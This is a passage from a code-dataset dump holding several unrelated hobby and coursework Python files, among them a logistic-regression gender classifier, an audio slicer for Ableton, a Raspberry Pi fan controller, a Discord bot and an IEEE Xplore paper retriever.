alpha step size\r\ndef clip(beta, alpha):\r\n # so find the min: beta or alpha\r\n clipped = np.minimum(beta, alpha)\r\n\r\n # find max: clipped or -alpha\r\n clipped = np.maximum(clipped, -alpha)\r\n\r\n return clipped\r\n\r\n# Calculates the proximal norm of betaHat with stepsize alpha\r\n# @betaHat betaHat\r\n# @alpha the stepsize\r\ndef proxL1Norm(betaHat, alpha, penalizeAll = True):\r\n \r\n # definition of prox operator\r\n out = betaHat - clip(betaHat, alpha)\r\n\r\n if not penalizeAll:\r\n # set the first value of prox as beta0\r\n out[0] = betaHat[0]\r\n \r\n return out\r\n\r\n# Does Logistic regression with L1 regularized term\r\n # and proximal gradient descent\r\n\r\n# @param X the X-values, augmented\r\ndef LogRegL1Regularized_proxGrad(X, y, myLambda):\r\n \r\n N, d = X.shape\r\n # N = num rows, d = num columns\r\n \r\n maxIter = 50\r\n # increasing helps\r\n \r\n # learn rate\r\n alpha = 0.00005\r\n\r\n # note: d is already the augmented size of columns\r\n beta = np.zeros(d)\r\n\r\n\r\n costFunVals = np.zeros(maxIter)\r\n # DOES PROXIMAL gradient method iteration\r\n for t in range(maxIter):\r\n # compute gradient of L\r\n #grad = X.T @ (X @ beta - y) # the smooth part of our objective function,\r\n # that was for linear regress\r\n \r\n grad = np.zeros(d)\r\n \r\n # computing grad\r\n \r\n # so slow because N is so darn huuge\r\n for i in range(N):\r\n Xi = X[i, :]\r\n Yi = y[i] # the ith y label\r\n qi= sigmoid(np.vdot(Xi, beta)) # predicted probability\r\n \r\n # computes the dot product of 2 vectors\r\n \r\n grad += (qi - Yi)*Xi # look at formula for gradient of L(B)\r\n \r\n # now my beta is huge\r\n beta = proxL1Norm(beta - alpha*grad, alpha*myLambda) \r\n\r\n # calcualte and save the current objective value\r\n # compute norm of that vector (norm of error), then square that norm\r\n # that's the smooth part of our objective function\r\n # also, add the regularization term\r\n # which is lamda * L1 norm of beta\r\n # L1norm of beta = np.sum(np.abs(beta)) = sum of all the abs value of compoenents of beta\r\n \r\n # for linear reg\r\n #costFunVals[t] = 0.5 * np.linalg.norm(X @ beta - y)**2 + myLambda * np.sum(np.abs(beta)) # objective function\r\n # since beta is not zero, then costFunVal (error) will not approach 0\r\n \r\n # for log reg\r\n costFunVals[t] = L(beta, X, y)\r\n \r\n if t % 10 == 0:\r\n print(\"iteration: \", t, \" Objective Function value: \", costFunVals[t])\r\n \r\n return beta, costFunVals\r\n\r\n# Calculates the accuracy percentage of my predictions\r\n# against Y_test\r\n# @param numTest the number of test subjects\r\n# @param predictions my predictions\r\n# @param Y_test the testing data solutions/ground truth\r\ndef findAccuracy(numTest, predictions, Y_test):\r\n numCorrect = 0\r\n for i in range(numTest):\r\n if predictions[i] == Y_test[i]:\r\n numCorrect += 1\r\n accuracy = numCorrect/numTest\r\n return accuracy\r\n\r\ndef getPredictionsLog(numTest, beta):\r\n myPred = np.zeros(numTest)\r\n for index in range(numTest):\r\n Xi = X_test[index]\r\n myProb = sigmoid(Xi @ beta)\r\n if myProb < 0.5:\r\n myPred[index] = 0\r\n else:\r\n myPred[index] = 1\r\n return myPred\r\n\r\n#myGenderFile = pd.read_csv(\"...\\\\gender-classifier-DFE-791531\\\\gender-classifier-DFE-791531.csv\", encoding = \"ISO-8859-1\")\r\n\r\n# Absolute path\r\nmyGenderFile = pd.read_csv(\"C:\\\\Users\\\\jghuynh\\\\Documents\\\\Machine_Learning\\\\Project_#5_Final_Gender\\\\gender-classifier-DFE-791531\\\\gender-classifier-DFE-791531.csv\", encoding = \"ISO-8859-1\")\r\n# type: dataframe\r\n\r\n# All the columns that have more than half the rows/people answered \"NA\"\r\nfewNAs = myGenderFile.columns[myGenderFile.isna().sum() <= 0.5*myGenderFile.shape[0]]\r\nmyGenderFile = myGenderFile[fewNAs]\r\n# eradicated 3 columns that had waaay too many NAss\r\n\r\n# columns with too big std\r\nbigSTD = [\"_golden\", \"gender:confidence\", \"profile_yn:confidence\"]\r\n\r\n# dropping those columns that have too big STD\r\nmyGenderFile.drop(bigSTD, axis = 1, inplace = True)\r\n\r\n# drop the columns in which the person's gender is \"unknown\" or \"brand\" (??)\r\n# in other words, keep the columns where gender is \"female\" or \"male\"\r\n\r\nmyGenderFile = myGenderFile.loc[(myGenderFile.gender == \"female\") | (myGenderFile[\"gender\"] == \"male\")]\r\n\r\nmyGenderFile = removeUnnecessaryCols(myGenderFile)\r\n\r\n# Using numpy to split\r\n# len(myGenderFile) = rows = 12894, for now\r\n# train: 80%\r\n# validate: 10%\r\n# test: 10%\r\n# first param: 0.8 - 80% dataframe for train\r\n# 2nd param: 0.9: 1 - 0.9 = 10% for test\r\n# validate is 10% because 2nd param - 1st param = 0.9 - 0.8 = 0.1 = 10%\r\ntrain, validate, test = np.split(myGenderFile.sample(frac=1), [int(.8*len(myGenderFile)), int(.9*len(myGenderFile))])\r\n#X_train = train\r\ntrain = oneHotEncode(train)\r\nvalidate = oneHotEncode(validate)\r\ntest = oneHotEncode(test)\r\n\r\n# since our gender column is one-hot encoded, we do not have column name \"gender\"\r\n# so now, look at female column\r\n# if value = 1, person is female; male otherwise\r\n\r\nY_train = train[\"female\"].values\r\n# Y_oneHot = pd.get_dummies(Y_train).values\r\n#K = Y_oneHot.shape[1]\r\n\r\nX_train = train.drop(\"female\", axis = 1)\r\nX_train.drop(\"male\", axis = 1, inplace = True)\r\nX_train = X_train.values\r\n\r\nY_valid = validate[\"female\"].values\r\n#X_valid = validate\r\nX_valid = validate.drop(\"female\", axis = 1)\r\nX_valid.drop(\"male\", axis = 1, inplace = True)\r\nX_valid = X_valid.values\r\n\r\nY_test = test[\"female\"].values\r\nX_test = test.drop(\"female\", axis = 1)\r\nX_test.drop(\"male\", axis = 1, inplace = True)\r\n\r\n# getting ride of NAs in the numeric columns\r\ncolsWithNAs = X_train.columns[X_train.isna().sum() > 0]\r\nfor col in colsWithNAs:\r\n X_train[col] = X_train[col].fillna(X_train[col].mean())\r\n X_test[col] = X_test[col].fillna(X_test[col].mean())\r\n#X[\"Age\"] = X[\"Age\"].fillna(X[\"Age\"].mean())\r\ncolsWithNAs = X_test.columns[X_test.isna().sum() > 0]\r\nfor col in colsWithNAs:\r\n X_train[col] = X_train[col].fillna(X_train[col].mean())\r\n X_test[col] = X_test[col].fillna(X_test[col].mean())\r\n\r\n\r\n\r\n# Wow that took a long time!\r\n\r\n\r\n# how penalized are we to make beta sparse\r\n# mylabda = 100, 200, ... 10000\r\nmyLambda = 900\r\n#beta, costFunVals = solveLasso_proxGrad(X, y, myLambda)\r\n# TODO: Make X_train all numbers\r\nbeta, costFunVals = LogRegL1Regularized_proxGrad(X_train, Y_oneHot, myLambda)\r\n\r\n\r\n\r\n'''\r\n\r\n\r\nX = myGenderFile.loc[:, :]\r\nX.drop(\"gender\", axis = 1, inplace = True)\r\nX = X.values # transform into numpy array\r\n\r\ny = myGenderFile[\"gender\"].values\r\nX_train, X_test, Y_train, Y_test = sk.model_selection.train_test_split(X, y, train_size = 0.8) #random_state = 1)\r\n\r\n# using Skleanr to split\r\nX_train = (X_train - X_train.mean(axis = 0))/X_train.std(axis = 0) # (xvalue - mean)/standard deviation\r\n\r\n# Using numpy to split\r\n# len(myGenderFile) = rows = 12894, for now\r\ntrain, validate, test = np.split(df.sample(frac=1), [int(.8*len(myGenderFile)), int(.9*len(myGenderFile))])\r\nX_train = train\r\nX_train.drop(\"gender\", axis = 1, inplace = True)\r\nX_train = X_train.values\r\n\r\nY_train = train[\"gender\"].values\r\n\r\n\r\n# pretend as if we had never seen the X_test data before.\r\n# our predictions are more slightly accurate\r\n# if use X_test.mean, we are cheating!\r\nX_test = (X_test - X_train.mean(axis = 0))/X_train.std(axis = 0)\r\n\r\n# Augment the X data\r\nX_test = np.insert(X_test, 0, 1, axis = 1)\r\nX_train = np.insert(X_train, 0, 1, axis = 1)\r\n\r\nN = X.shape[0] # number of training examples/rows\r\nd = X.shape[1] # number of characteristics/columns\r\n'''\r\n","sub_path":"Gender_Twitter.py","file_name":"Gender_Twitter.py","file_ext":"py","file_size_in_byte":11163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"506576106","text":"#!/usr/bin/env python3\n#coding: utf-8\n\nimport requests\nimport json\n\n#headers = {'content-type': 'application/x-www-form-urlencoded'}\n\nparamss = {'consumer_key': 'Your Pocket Consumer Key',\n 'access_token': 'Your Pocket Access Token',\n 'username': 'Your User Name'}\n\nr = requests.post(\"https://getpocket.com/v3/get\", params=paramss)\n\nprint(r.url)\nprint(r.status_code)\nprint(r.headers)\n\n\nrj = r.json()\n\n#print(json.dumps(rj, sort_keys=True, indent=2, ensure_ascii=False))\n\nfor key in rj['list'].keys():\n print(\"{0}: {1}\".format(\"title\", rj['list'][key]['resolved_title']))\n","sub_path":"get_pocket.py","file_name":"get_pocket.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"9886068","text":"entrada = open(\"human.fasta\").read()\nsaida = open(\"human.html\", \"w\")\n\ncont = {}\n\nfor i in ['A', 'T', 'C', 'G']:\n\tfor j in ['A', 'T', 'C', 'G']:\n\t\tcont[i + j] = 0\n\nentrada = entrada.replace(\"\\n\",\"\")\n\ntry:\n\tfor k in range(len(entrada)):\n\t\tcont[entrada[k] + entrada[k + 1]] += 1\nexcept:\n\twarning = 1\n\ni = 1\n\nfor l in cont:\n\tsaida.write(\"
\"+l+\"
\\n\")\n\tif i % 4 == 0:\n\t\tsaida.write(\"
\")\n\n\ti+=1\n\nsaida.close()\n","sub_path":"Estudo de Caso - BioInformática - Genomas/estudo_de_caso_dna_human.py","file_name":"estudo_de_caso_dna_human.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"82771214","text":"\"\"\"Split a wave into multiple equal-sized parts.\"\"\"\nfrom __future__ import print_function\n\nimport wave\nimport os\nimport time\nimport sys\nimport getopt\nfrom inspect import getmembers, isfunction\nfrom pydub import AudioSegment\n\nimport adgcreator\nimport slicers\nimport namegen\n\n\ndef pmsg(message):\n \"\"\"Message styling.\"\"\"\n width = 28\n length = len(message)\n border = \"##\"\n i = 1\n blank = \"\"\n while i < (width - (length / 2)):\n blank += \" \"\n i += 1\n print(\"%s%s%s%s%s\" % (border, blank, str(message), blank, border))\n return None\n # print(\"##### %s #####\" % str(message))\n\n\ndef clr(num=0):\n \"\"\"Clear screen after num seconds.\"\"\"\n print(\"Clearing in %d seconds...\" % num)\n time.sleep(num)\n os.system('cls' if os.name == 'nt' else 'clear')\n return\n\n\ndef killit(num=0):\n \"\"\"Sleep for num seconds and then shut down gracefully.\"\"\"\n if num > 0:\n print(\"Shutting down in %i seconds...\" % num)\n # time.sleep(num)\n sys.exit(1)\n\n\ndef create_paths(paths, opt, namer=None):\n \"\"\"Create necessary directories.\"\"\"\n if opt == 0:\n paths['adg_path'] = paths['outpath'] + os.sep + namer + \" Project\"\n paths['config_path'] = paths['adg_path'] + os.sep + \\\n \"Ableton Project Info\"\n paths['samp_path'] = paths['adg_path'] + os.sep + \"Samples\" \\\n + os.sep + \"Imported\"\n try:\n for item in paths:\n if not os.path.exists(paths[item]):\n os.makedirs(paths[item])\n except OSError:\n print(\"Can not create necessary directories.\")\n killit()\n if opt == 0:\n return paths\n return None\n\n\ndef open_wave_file(fname=None):\n \"\"\"Open and return list of Wave object and meta.\"\"\"\n if fname is None:\n fname = input(\"Name of file to split?: \")\n pmsg(\"Opening %s\" % fname)\n try:\n obj = wave.open(fname, 'r')\n except OSError:\n print(\"File does not exist or broken. Closing down.\")\n killit(2)\n if (float(obj.getnframes()) / float(obj.getframerate())) < 0.05:\n print(\"Source file too short. Use a longer source file.\")\n killit(2)\n return {'wave': obj,\n 'waveframes': obj.getnframes(),\n 'waverate': obj.getframerate(),\n 'wavechan': obj.getnchannels(),\n 'wavedepth': obj.getsampwidth(),\n 'waveorig': fname}\n\n\ndef choose_slice_type(algos, chosen):\n \"\"\"Prompt for slice type and initiate specific slice.\"\"\"\n validletters = ['x', 'X', 'q', 'Q']\n validchoices = []\n for i in validletters:\n validchoices.append(i)\n for i in list(range(0, len(algos))):\n validchoices.append(str(i))\n if chosen is None:\n pmsg(\"Choose Algorithm\")\n pmsg(\"\")\n pmsg(\"Choose a slice algorithm:\")\n for idx, i in enumerate(algos):\n print(\"%d = %s\" % (idx, i[1].__doc__))\n print(\"x = Quit\")\n choice = input(\"Choice: \")\n while choice not in validchoices or choice == \"\":\n choice = input(\"Choice: \")\n if choice in [\"x\", \"X\", \"q\", \"Q\"]:\n sys.exit(1)\n else:\n if chosen not in validchoices or chosen in validletters:\n try:\n chosen = int(chosen)\n print(\"Error: That slicer option does not exist.\")\n except ValueError:\n pmsg(\"\")\n pmsg(\"Error: Slicer choice must be a number.\")\n sys.exit(1)\n pmsg(\"Chosen Algorithm: %s\" % chosen)\n choice = chosen\n pmsg(algos[int(choice)][1].__doc__)\n return algos[int(choice)]\n\n\ndef choose_slice_count(obj, chosen):\n \"\"\"Prompt for number of samples desired.\"\"\"\n slice_count = 0\n max_slices = (obj.getnframes()/20)\n if max_slices > 128:\n max_slices = 128\n pmsg(\"Max slices available: %d\" % max_slices)\n if chosen is not None:\n try:\n slice_count = int(chosen)\n if slice_count > max_slices:\n chosen = max_slices\n if slice_count < 1:\n chosen = 1\n except ValueError:\n pmsg(\"Error: Slice count must be a number\")\n while (slice_count < 1) or (slice_count > max_slices):\n slice_count = input(\"How many samples do you want? \")\n try:\n slice_count = int(slice_count)\n except ValueError:\n print(\"%s is not a number. I need a number.\" % str(slice_count))\n continue\n if slice_count > max_slices:\n print(\"Not enough frames for %d samples.\" % slice_count)\n if slice_count < 1:\n print(\"You wouldn't be here if you wanted %d.\" % slice_count)\n return slice_count\n\n\ndef write_waves(path, source, markers):\n \"\"\"Write a wave file for every marker in markers.\"\"\"\n pmsg(\"Writing wave files\")\n new_obj_list = []\n p_list = {}\n p_list['rel'] = path + os.sep + source['namer'] + \" Project\" + os.sep\n p_list['samp'] = p_list['rel'] + os.sep + \"Samples\"\n p_list['imp'] = p_list['samp'] + os.sep + \"Imported\"\n p_list['wavebase'] = p_list['imp'] + os.sep + source['namer'] + \"-\"\n create_paths({'relpath': p_list['rel'],\n 'samples': p_list['samp'],\n 'imported': p_list['imp']}, 1)\n for idx, mark in enumerate(markers):\n full_name = p_list['wavebase'] + str(idx + 1) + \".wav\"\n new_obj = wave.open(full_name, 'w')\n new_obj.setparams((source['wave'].getnchannels(),\n source['wave'].getsampwidth(),\n source['wave'].getframerate(),\n mark['length'],\n \"NONE\",\n \"not compressed\"))\n source['wave'].setpos(mark['sframe'])\n new_obj.writeframes(source['wave'].readframes(mark['length']))\n new_obj.close()\n new_obj_list.append(os.path.abspath(full_name))\n return new_obj_list\n\n\ndef set_vol(file_list):\n \"\"\"Set volume of sample.\"\"\"\n vol_list = []\n for item in file_list:\n work = AudioSegment.from_wav(item)\n vol_list.append(\"%.2f\" % (-12 + (work.dBFS * -1)))\n return vol_list\n\n\ndef generate_name(min_len, max_len, fname):\n \"\"\"Generate name using Markov chain - namegen.\"\"\"\n splitters = ['a', 'e', 'i', 'o', 'u', 'qu', 'gh']\n with open(fname, 'r') as obj:\n filedata = [x.lstrip().rstrip() for x in obj.readlines()]\n new_name = namegen.GenerateName(\n namegen.SplitAtTerms(filedata, splitters),\n min_len, max_len, '')\n return new_name\n\n\ndef set_options(opts):\n \"\"\"Set standard options.\"\"\"\n options = {x: None for x in ['input_file',\n 'slicer',\n 'count',\n 'non_slicer']}\n for i in opts:\n options[i] = opts[i]\n options['non_slicer'] = ['set_lengths', 'new_set_lengths', 'ask_len']\n return options\n\n\ndef get_args(args):\n \"\"\"Get arguments if they exist.\"\"\"\n help_text = \"livewaveslicer.py \\\n {-i \\\n -s \\\n -c \\\n -n }\"\n try:\n opts, args = getopt.getopt(args,\n \"hi:s:c:n:\",\n [\"ifile=\",\n \"slicer=\",\n \"count=\",\n \"namer=\"])\n except getopt.GetoptError:\n print(help_text)\n killit()\n\n options = {}\n for opt, arg in opts:\n if opt == '-h':\n print(help_text)\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n options['input_file'] = arg\n elif opt in (\"-s\", \"--slicer\"):\n options['slicer'] = arg\n elif opt in (\"-c\", \"--count\"):\n options['count'] = arg\n elif opt in (\"-n\", \"--namer\"):\n options['namer'] = arg\n return options\n\n\ndef handle(args):\n \"\"\"Main program execution handler.\"\"\"\n clr()\n opts = set_options(get_args(args))\n slicerlist = [x for x in getmembers(slicers)\n if isfunction(x[1])\n and x[0] not in opts['non_slicer']]\n\n if opts['input_file']:\n lump = open_wave_file(opts['input_file'])\n else:\n lump = open_wave_file()\n\n opts['slicer'] = choose_slice_type(slicerlist, opts['slicer'])\n opts['count'] = choose_slice_count(lump['wave'], opts['count'])\n marker_list = opts['slicer'][1](lump, opts)\n if marker_list is None:\n print(\"No slices - exiting...\")\n sys.exit()\n finish = input(\"Ready to build - do you want to continue?? (Y/N): \")\n if finish in ['y', 'Y']:\n try:\n lump['namer'] = generate_name(6, 16, opts['namer'])\n except KeyError:\n lump['namer'] = generate_name(6, 16, 'namegen-source.txt')\n workpaths = {'outpath': \"output\"}\n workpaths = create_paths(workpaths, 0, lump['namer'])\n file_list = write_waves(workpaths['outpath'], lump, marker_list)\n volume_list = set_vol(file_list)\n adgcreator.build_adg([file_list, volume_list],\n lump['namer'],\n workpaths['adg_path'],\n marker_list)\n pmsg(\"Finished!\")\n print(\"Your project, \\\"%s\\\", can be found in the \\'output\\' folder.\" % lump['namer'])\n pmsg(\"\")\n pmsg(\"Happy Ableton-ing!\")\n pmsg(\"\")\n else:\n print(\"Thanks for trying - maybe next time...\")\n killit(2)\n\n\nif __name__ == '__main__':\n handle(sys.argv[1:])\n","sub_path":"livewaveslicer.py","file_name":"livewaveslicer.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"126359745","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom RPi import GPIO\nfrom time import sleep\nimport sys\n\n# A GPIO pin number that connected with a fan controller\nFAN_GPIO = 18 # BCM number\n\n#\nPWM_FREQ = 25 # [Hz] Change this value if fan has strange behavior\n\n# A time period of monitoring the SoC temperature\nINTERVAL = 2 # in seconds (greater than 0)\n\n# Uses this load value when the SoC temperature is less than minimum working temperature\nIDLE_LOAD = 0\n\n# Each step must be a tuple that have temperature and fans load ratio\n# The tempratures unit is in celcius degrees. (0~100)\n# The fans load ratios unit is in percentage. (0~100)\nTEMP_LOAD_STEPS = [\n (55, 40),\n (58, 50),\n (60, 80),\n (63, 100)\n]\n\n# Fan speed will change only of the difference of temperature is higher than hysteresis\nIDLE_HYST = 1\n\n# Validate steps\nif len(TEMP_LOAD_STEPS) < 1:\n sys.stderr.write(\"There is no given steps.\\n\")\n exit(1)\nfor step_idx, (step_temp, step_load) in enumerate(TEMP_LOAD_STEPS):\n if not 0 <= step_temp <= 100:\n sys.stderr.write(\"The temperature value in the step %s is not between 0 and 100.\\n\" % step_idx)\n exit(1)\n if not 0 <= step_load <= 100:\n sys.stderr.write(\"The load value in the step %s is not between 0 and 100.\\n\" % step_idx)\n exit(1)\n if step_idx > 0:\n prev_step_temp, prev_step_load = TEMP_LOAD_STEPS[step_idx-1]\n if step_temp < prev_step_temp:\n sys.stderr.write(\"The temperature value in the step %s is smaller than previous steps one.\\n\" % step_idx)\n exit(1)\n if step_load < prev_step_load:\n sys.stderr.write(\"The load value in the step %s is smaller than previous steps one.\\n\" % step_idx)\n exit(1)\n\n# Setup GPIO pin\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(FAN_GPIO, GPIO.OUT)\nfan = GPIO.PWM(FAN_GPIO, PWM_FREQ)\nfan.start(100)\nis_idle = False\n\n# Start loop\ntry:\n while True:\n # Wait until next refresh\n sleep(INTERVAL)\n\n # Read CPU temperature\n with open(\"/sys/class/thermal/thermal_zone0/temp\", \"r\") as file:\n temp = float(file.read()) / 1000\n\n min_temp, min_load = TEMP_LOAD_STEPS[0]\n if temp < min_temp:\n if not is_idle:\n if temp >= min_temp - IDLE_HYST:\n fan.ChangeDutyCycle(min_load)\n continue\n else:\n is_idle = True\n fan.ChangeDutyCycle(IDLE_LOAD)\n else:\n if is_idle:\n if temp < min_temp + IDLE_HYST:\n continue\n else:\n is_idle = False\n # load = min_load\n load = min_load\n for step_idx, (step_temp, step_load) in enumerate(TEMP_LOAD_STEPS):\n if step_idx == 0:\n continue\n prev_temp, prev_load = TEMP_LOAD_STEPS[step_idx-1]\n if prev_temp <= temp < step_temp:\n percentage = (temp - prev_temp) / (step_temp - prev_temp)\n load = prev_load + percentage * (step_load - prev_load)\n # print(\"pt:%s pl:%s st:%s sl:%s P:%s\"% (prev_temp, prev_load, step_temp, step_load, percentage))\n break\n elif temp >= step_temp and step_idx + 1 == len(TEMP_LOAD_STEPS):\n load = step_load\n fan.ChangeDutyCycle(load)\n #print(\"T:%s L:%s\" % (temp, load))\n\n# On keyboard interrupt occurs\nexcept KeyboardInterrupt:\n fan.stop()\n GPIO.cleanup()\n exit()\n","sub_path":"pwm_fan_ctrl.py","file_name":"pwm_fan_ctrl.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"11425798","text":"\"\"\"\nCreated on Nov 3, 2016\n\n@author: jvazquez\n\"\"\"\nimport logging\n\nimport redis\n\nfrom tenant.listener.alchemy import session, Tenant\nfrom tenant.listener.extensions import configurator\nfrom tenant.listener.tenant import TenantListener\nfrom tenant.listener.alchemy import DatabaseFactory\nlogger = logging.getLogger(__name__)\n\n\ndef setup_redis():\n \"\"\"Setup the redis database connection\n \"\"\"\n\n redis_host = configurator.get(\"cache\", \"redis_host\")\n redis_port = configurator.get(\"cache\", \"redis_port\")\n redis_db = configurator.get(\"cache\", \"redis_db\")\n redis_connection = redis.StrictRedis(host=redis_host, port=redis_port,\n db=redis_db)\n return redis_connection\n\n\ndef push():\n tenant_listener = TenantListener()\n redis_client = setup_redis()\n ids = []\n for tenant in session.query(Tenant).all():\n structure = tenant_listener.obtain_microservices_structure(tenant.id)\n ids.append(tenant.id)\n for service in structure[\"microservices\"]:\n protocol = service[\"protocol\"]\n name = service[\"service_name\"]\n if protocol == \"postgresql+psycopg2\":\n data = DatabaseFactory.build_alchemy_url(service)\n elif protocol == \"mongo\":\n data = service[\"dbname\"]\n logger.info(\"{} {} {}\".format(tenant.id, name, data))\n exists = redis_client.hget(tenant.id, name)\n if exists:\n logger.info(\"Deleting name: {}\".format(name))\n redis_client.hdel(tenant.id, name)\n redis_client.hset(tenant.id, name, data)\n logger.info(\"All connections pushed\")\n # setup = list(map(lambda tenant_id: redis_client.hgetall(tenant_id), ids))\n","sub_path":"tenant/listener/connections.py","file_name":"connections.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"263707967","text":"import os\nimport asyncpg\n\nimport discord\nfrom discord.ext import commands\n\nclass HowLong(commands.Bot):\n def __init__(self):\n self.INITIALS = [\"jishaku\", \"cogs.events\", \"cogs.owner\", \"cogs.misc\"]\n super().__init__(command_prefix=\"how long \", case_insensitive=True)\n self.db = self.loop.run_until_complete(asyncpg.create_pool(database=\"howlong\", user=\"postgres\", password=os.environ.get(\"PG_PASSWORD\")))\n \n async def on_ready(self):\n self.remove_command(\"help\")\n for cog in self.INITIALS:\n try:\n self.load_extension(cog)\n print(cog)\n except Exception as error:\n raise error\n continue\n\nif __name__ == \"__main__\":\n HowLong().run(os.environ.get(\"TOKEN\"), reconnect=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"173587116","text":"from login import thunder_login\nimport requests\n\nif __name__ == '__main__':\n\tthunder_login()\n\tprint('Enter auth_key:')\n\tauth_key = raw_input()\n\trequest_result = requests.get('https://raw.githubusercontent.com/Chion82/Chion82.github.io/master/server_host')\n\thost = request_result.text.replace('\\n','')\n\tresult = requests.post(host + '/api/update_cookie.do', data={\n\t\t'auth_key':auth_key, \n\t\t'cookie': str(open('cookie.txt', 'r').read())\n\t\t})\n\tprint(result.text)\n","sub_path":"web/update_cookie_local.py","file_name":"update_cookie_local.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"235614399","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 00:09:18 2020\n\n@author: johnoyegbite\n\"\"\"\n# SOLVED!\n\"\"\"\nProblem:\n Given a string, sort it in decreasing order based on the frequency of\n characters.\n\nExample 1:\n Input:\n \"tree\"\n Output:\n \"eert\"\n Explanation:\n 'e' appears twice while 'r' and 't' both appear once.\n So 'e' must appear before both 'r' and 't'. Therefore \"eetr\" is also\n a valid answer.\n\nExample 2:\n Input:\n \"cccaaa\"\n Output:\n \"cccaaa\"\n Explanation:\n Both 'c' and 'a' appear three times, so \"aaaccc\" is also a valid\n answer.\n Note that \"cacaca\" is incorrect, as the same characters must be\n together.\n\nExample 3:\n Input:\n \"Aabb\"\n Output:\n \"bbAa\"\n Explanation:\n \"bbaA\" is also a valid answer, but \"Aabb\" is incorrect.\n Note that 'A' and 'a' are treated as two different characters.\n\"\"\"\n\n\ndef sort_from_best(best, char_freq, sorted_s):\n for char in char_freq:\n if char_freq[char] == best:\n sorted_s.append(best*char)\n\n\ndef frequencySort(s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n char_freq = {}\n\n for char in s:\n char_freq[char] = char_freq.get(char, 0) + 1\n\n sorted_s = []\n\n decreasing_best = sorted(list(set(char_freq.values())), reverse=True)\n\n for best in decreasing_best:\n sort_from_best(best, char_freq, sorted_s)\n\n return ''.join(sorted_s)\n\n\nif __name__ == \"__main__\":\n s = \"eert\"\n print(frequencySort(s))\n","sub_path":"sort-characters-by-freq.py","file_name":"sort-characters-by-freq.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"375455790","text":"import ieee_xplore\nimport downloadPDF\nimport json\n\ndef main():\n #query = 'software testing'\n query = list()\n api_key = 'xxbuhzj7q5zfednrb9j49yzq'\n # keyword = input(\"What key words do you want to search: \")\n # query.append(keyword)\n # author = input(\"Who is the author you are looking for: \")\n # query.append(author)\n # path = input(\"Please input download path:\")\n with open('IEEE', 'r') as f:\n f_dict = json.load(f)\n for key in f_dict:\n if key == 'file':\n path = f_dict[key]\n continue\n if f_dict[key] != '':\n query.append(str(f_dict[key]).replace(\" \",\"_\"))\n\n ieee_retrieve = ieee_xplore.IEEEXploreRetrieve(query, api_key, maximum_results=1000)\n bibtex_database, lists, count = ieee_retrieve.pull()\n print(\"Number of eligible documents:\"+ str(count))\n downloader = downloadPDF.DownloadPDF(lists, count, path)\n downloader.download()\n print(bibtex_database)\n\nif __name__ == '__main__':\n main()","sub_path":"slr/slirm/retrievers/IEEE_START.py","file_name":"IEEE_START.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"654081897","text":"import c\nimport pygame\nimport time\nimport random\n\n#load all object sprite\nstar \t= [3,3]\ng_1\t\t= pygame.image.load(\"images/g1.png\")\ng_2\t\t= pygame.image.load(\"images/g2.png\")\ng_3\t\t= pygame.image.load(\"images/g3.png\")\ng_4\t\t= pygame.image.load(\"images/g4.png\")\ng_all\t= [g_1,g_2,g_3,g_4]\ny \t\t= -10\nx \t\t= random.randrange(0, c.G_WIDTH)\ngall \t= random.choice(g_all)\nclass Star(pygame.sprite.Sprite):\n\tdef __init__(self, color, pos):\n\t\t#Calling sprite class.\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\t#Creates a square.\n\t\tself.image = pygame.Surface(star)\n\t\t#fill the square\n\t\tself.image.fill(color)\n\t\t#Arrange postion.\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = pos\n\n\tdef update(self , speed):\n\t\tself.rect.x += 0\n\t\tself.rect.y += 1 + speed\n\t\tif self.rect.y > c.G_HEIGHT:\n\t\t\tself.rect.y = 0\n\t\t\tself.rect.x = random.randrange(0, c.G_WIDTH)\n\ndef gal(fast):\n\tglobal x, y, gall\n\ty += fast\n\tc.display.blit(gall,(x,y))\t\n\tif y > c.G_HEIGHT:\n\t\ty = -1800\n\t\tx = random.randrange(0, c.G_WIDTH)\n\t\tgall = random.choice(g_all)\n\t\n\n\ndef move(amount, obj):\n\tfor i in range(amount):\n\t\ttemp_x = random.randrange(0, c.G_WIDTH)\n\t\ttemp_y = random.randrange(0, c.G_HEIGHT)\n\t\tobj.add(Star(random.choice(c.s_colors),[temp_x,temp_y]))\n\n","sub_path":"hadron/obj.py","file_name":"obj.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"312674710","text":"import time\nimport psutil\nimport os\n\nMODEL_FILE_PATH = 'models/model.pickle'\n\n# Benchmark\nexecution_start_time = time.time()\n\n# Process features\nfrom features_processor import load_data\nfeatures, labels = load_data('test')\n\n# Load model from file\nimport pickle\nfile = open(MODEL_FILE_PATH, 'rb')\nclf = pickle.load(file)\nfile.close()\n\n# Test 